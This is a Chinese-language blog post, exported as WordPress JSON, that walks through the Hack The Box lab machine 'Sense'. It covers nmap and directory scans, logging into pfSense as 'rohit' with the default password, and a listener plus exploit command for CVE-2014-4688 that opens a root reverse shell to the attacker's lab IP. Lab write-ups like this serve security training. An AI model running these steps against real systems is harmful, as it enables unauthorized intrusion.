{"id":102,"date":"2024-11-13T09:13:29","date_gmt":"2024-11-13T01:13:29","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=102"},"modified":"2024-11-13T09:51:34","modified_gmt":"2024-11-13T01:51:34","slug":"htb_machine_sense","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/htb_machine_sense\/","title":{"rendered":"HTB\u9776\u673a Sense \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.60<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">\u250c\u2500\u2500(root\u327fhacker)-[\/home\/\u2026\/Documents\/pentest_notes\/sense\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.60\nPING 10.10.10.60 (10.10.10.60) 56(84) bytes of data.\n64 bytes from 10.10.10.60: icmp_seq=1 ttl=63 time=336 ms\n64 bytes from 10.10.10.60: icmp_seq=2 ttl=63 time=329 ms\n64 bytes from 10.10.10.60: icmp_seq=3 ttl=63 time=336 ms\n64 bytes from 10.10.10.60: icmp_seq=4 ttl=63 time=334 ms\n\n--- 10.10.10.60 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3002ms\nrtt min\/avg\/max\/mdev = 329.438\/333.697\/335.909\/2.584 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u72b6\u6001\u826f\u597d\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jun 21 10:31:29 2024 as: nmap -sA -p- --min-rate 2000 -oN .\/ack_result.txt 10.10.10.60\nNmap scan report for 10.10.10.60 (10.10.10.60)\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.10.10.60 (10.10.10.60) are in ignored states.\nNot shown: 65535 filtered tcp ports (no-response)\n\n# Nmap done at Fri Jun 21 10:32:37 2024 -- 1 IP address (1 host up) scanned in 68.60 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jun 21 10:35:26 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN .\/tcp_result.txt 10.10.10.60\nNmap scan report for 10.10.10.60 (10.10.10.60)\nHost is up (0.34s latency).\nNot shown: 65533 filtered tcp ports (no-response)\nPORT    STATE SERVICE  VERSION\n80\/tcp  open  http     lighttpd 1.4.35\n|_http-title: Did not follow redirect to https:\/\/10.10.10.60\/\n|_http-server-header: lighttpd\/1.4.35\n443\/tcp open  ssl\/http lighttpd 1.4.35\n| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)\/organizationName=CompanyName\/stateOrProvinceName=Somewhere\/countryName=US\n| Not valid before: 2017-10-14T19:21:35\n|_Not valid after:  2023-04-06T19:21:35\n|_http-title: Login\n|_ssl-date: TLS randomness does not represent time\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose|specialized\nRunning (JUST GUESSING): OpenBSD 4.X (91%), Comau embedded (89%), Linux 2.6.X (87%)\nOS CPE: cpe:\/o:openbsd:openbsd:4.0 cpe:\/o:linux:linux_kernel:2.6.29\nAggressive OS guesses: OpenBSD 4.0 (91%), Comau C4G robot control unit (89%), Linux 2.6.29 (87%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 3 hops\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   335.36 ms 10.10.14.1 (10.10.14.1)\n2   ...\n3   340.99 ms 10.10.10.60 (10.10.10.60)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Fri Jun 21 10:37:17 2024 -- 1 IP address (1 host up) scanned in 110.46 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Fri Jun 21 10:33:16 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.60\nNmap scan report for 10.10.10.60 (10.10.10.60)\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.10.10.60 (10.10.10.60) are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Fri Jun 21 10:34:25 2024 -- 1 IP address (1 host up) scanned in 69.23 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>OpenBSD<\/code>\uff0c\u7248\u672c\u5927\u81f4\u4e3a<code>4<\/code>\u3002<\/p>\n<hr \/>\n<h1>Web\u670d\u52a1\u63a2\u6d4b<\/h1>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/10.10.10.60\/<\/code>\uff0c\u53d1\u73b0\u9776\u673a\u90e8\u7f72\u4e86<code>pfSense<\/code>\u5f00\u6e90\u5e94\u7528\u5c42\u9632\u706b\u5899\u7cfb\u7edf\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719013664326-6ba652da-c57e-4e15-ba3f-18ef34938be0.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Sat Jun 22 08:00:59 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u https:\/\/10.10.10.60\/ -x 400,403,404 -t 60 -e php,js,html,txt,zip,tar.gz,pcap\n\n200   199B   https:\/\/10.10.10.60\/changelog.txt\n301     0B   https:\/\/10.10.10.60\/classes    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/classes\/\n301     0B   https:\/\/10.10.10.60\/css    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/css\/\n200     1KB  https:\/\/10.10.10.60\/favicon.ico\n301     0B   https:\/\/10.10.10.60\/includes    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/includes\/\n200   329B   https:\/\/10.10.10.60\/index.html\n301     0B   https:\/\/10.10.10.60\/installer    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/installer\/\n301     0B   https:\/\/10.10.10.60\/javascript    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/javascript\/\n200     6KB  https:\/\/10.10.10.60\/license.php\n200     6KB  https:\/\/10.10.10.60\/stats.php\n200     6KB  https:\/\/10.10.10.60\/status.php\n200     6KB  https:\/\/10.10.10.60\/system.php\n301     0B   https:\/\/10.10.10.60\/themes    -&gt; REDIRECTS TO: https:\/\/10.10.10.60\/themes\/\n200   384B   https:\/\/10.10.10.60\/xmlrpc.php<\/code><\/pre>\n<p>\u540c\u65f6\u4f7f\u7528\u53e6\u4e00\u4e2a\u5b57\u5178\u53d1\u73b0\u4e86<code>\/tree<\/code>\u76ee\u5f55\u3002<\/p>\n<p>\u8bbf\u95ee<code>\/changelog.txt<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-plain\"># Security Changelog \n\n### Issue\nThere was a failure in updating the firewall. Manual patching is therefore required\n\n### Mitigated\n2 of 3 vulnerabilities have been patched.\n\n### Timeline\nThe remaining patches will be installed during the next maintenance window<\/code><\/pre>\n<p>\u63d0\u793a\u6211\u4eec<code>3<\/code>\u4e2a\u6f0f\u6d1e\u4e2d\u7684<code>2<\/code>\u4e2a\u5df2\u7ecf\u88ab\u4fee\u590d\u3002<\/p>\n<p>\u8bbf\u95ee<code>\/index.html<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719016389338-b94d939a-7a49-4037-b1ba-53e644ebb75e.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4e00\u4e2a\u6307\u5411<code>\/dfuife.cgi<\/code>\u7684\u5947\u602a\u94fe\u63a5\uff08\u8bbf\u95ee\u540e\u600e\u4e48\u90fd\u4e0d\u54cd\u5e94\uff09\uff0c\u4ee5\u53ca\u4e00\u6bb5\u6ce8\u91ca\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;HTML&gt;\n&lt;BODY&gt;\n\n&lt;center&gt;\n\n&lt;img src='fred.png'&gt;\n\n&lt;p&gt;\n    &lt;A HREF='\/dfuife.cgi'&gt;Begin installation&lt;\/A&gt;\n&lt;\/p&gt;\n\n&lt;!--\n&lt;p&gt;\n    Connect to host via SSH: \n    &lt;applet CODEBASE=\".\" ARCHIVE=\"jta20.jar\" CODE=\"de.mud.jta.Applet\" WIDTH=55 HEIGHT=25&gt;\n    &lt;param NAME=\"config\" VALUE=\"applet.conf\"&gt;\n    &lt;\/applet&gt;\n&lt;\/p&gt;\n--&gt;\n\n&lt;\/center&gt;\n\n&lt;\/BODY&gt;\n&lt;\/HTML&gt;<\/code><\/pre>\n<p>\u8bbf\u95ee<code>\/tree<\/code>\u76ee\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719017535353-bc18fbd7-301a-48ef-8e41-5e33eb0f7402.png\" alt=\"\" \/><\/p>\n<p>\u4e0d\u77e5\u9053\u5176\u5177\u4f53\u7528\u9014\uff0c\u626b\u63cf\u4e00\u4e0b\u76ee\u5f55\uff0c\u4e00\u70b9\u4e1c\u897f\u90fd\u6ca1\u626b\u51fa\u6765\u3002<\/p>\n<p>\u5c1d\u8bd5\u5bf9<code>pfSense<\/code>\u7cfb\u7edf\u8fdb\u884c\u5bc6\u7801\u7206\u7834\uff0c\u5931\u8d25\u3002\uff08\u767b\u5f55\u5c1d\u8bd5\u6b21\u6570\u8fc7\u591a\u76f4\u63a5\u505c\u6b62\u7f51\u9875\u8bbf\u95ee\uff09<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>\u5927\u5b57\u5178\u679a\u4e3e\u76ee\u5f55<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>Gobuster<\/code>\u5de5\u5177\u914d\u5408\u5927\u5b57\u5178<code>directory-list-2.3-medium.txt<\/code>\u679a\u4e3e\u7f51\u7ad9\u6839\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u https:\/\/10.10.10.60\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 60 -k -b 400,403,404 -x .php,.js,.html,.txt<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719027806675-9550e1ad-9db5-41be-9700-976cc5bc9157.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u679a\u4e3e\u51fa\u6587\u4ef6<code>system-users.txt<\/code>\u3002\u5c1d\u8bd5\u8bbf\u95ee\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-plain\">####Support ticket###\n\nPlease create the following user\n\nusername: Rohit\npassword: company defaults<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u4e86\u7528\u6237<code>rohit<\/code>\uff0c\u4f46\u5bc6\u7801\u5b57\u6bb5\u4e3a<code>company defaults<\/code>\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>pfSense<\/code>\u7684\u9ed8\u8ba4\u5bc6\u7801\uff1a<\/p>\n<ul>\n<li><strong>\u7528\u6237\u540d\uff1a<\/strong><code>**rohit**<\/code><\/li>\n<li><strong>\u5bc6\u7801\uff1a<\/strong><code>**pfsense**<\/code><\/li>\n<\/ul>\n<p><strong>\u6210\u529f\u767b\u5f55\uff1a<\/strong><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719028186442-cb646a01-c4d8-4f04-a047-c8bfa2ec7b22.png\" alt=\"\" \/><\/p>\n<p>\u540c\u65f6\u53d1\u73b0<code>pfSense<\/code>\u7684\u7248\u672c\u4e3a<code>v2.1.3<\/code>\u3002<\/p>\n<h2>\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u901a\u8fc7\u67e5\u9605\u7f51\u7edc\u516c\u5f00\u6f0f\u6d1e\u5e93\uff0c\u53d1\u73b0\u4e00\u4e2a\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e<code>CVE-2014-4688<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719028512723-37e7ff3b-91ea-4842-aff5-ecc3c56e1b3b.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u4e0b\u8f7d<code>EXP<\/code>\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">rlwrap nc -l -p 443 -s 10.10.14.2\n.\/exp.py --rhost 10.10.10.60 --lhost 10.10.14.2 --lport 443 --username rohit --password pfsense<\/code><\/pre>\n<p>\u6210\u529f\u53cd\u5f39Shell\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1719029033408-1df83572-95fd-4713-a9e3-ca32057a183e.png\" alt=\"\" \/><\/p>\n<p><del><span style=\"color: #df2a3f; background-color: #fbde28;\">\u800c\u4e14\u7adf\u7136\u76f4\u63a5\u662f<\/span><\/del><code>~~&lt;font style=\"color:#DF2A3F;background-color:#FBDE28;\"&gt;root&lt;\/font&gt;~~<\/code><del><span style=\"color: #df2a3f; background-color: #fbde28;\">\u6743\u9650\uff1f\uff1f\uff1f\uff1f!!!\u2211(\uff9f\u0414\uff9f\u30ce)\u30ce<\/span><\/del><\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<pre><code class=\"language-plain\">d08c32a5d4f8c8b10e76eb51a69f1a86<\/code><\/pre>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.60 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fhacker)-[\/home\/\u2026\/Docum &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-102","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=102"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/102\/revisions"}],"predecessor-version":[{"id":103,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/102\/revisions\/103"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}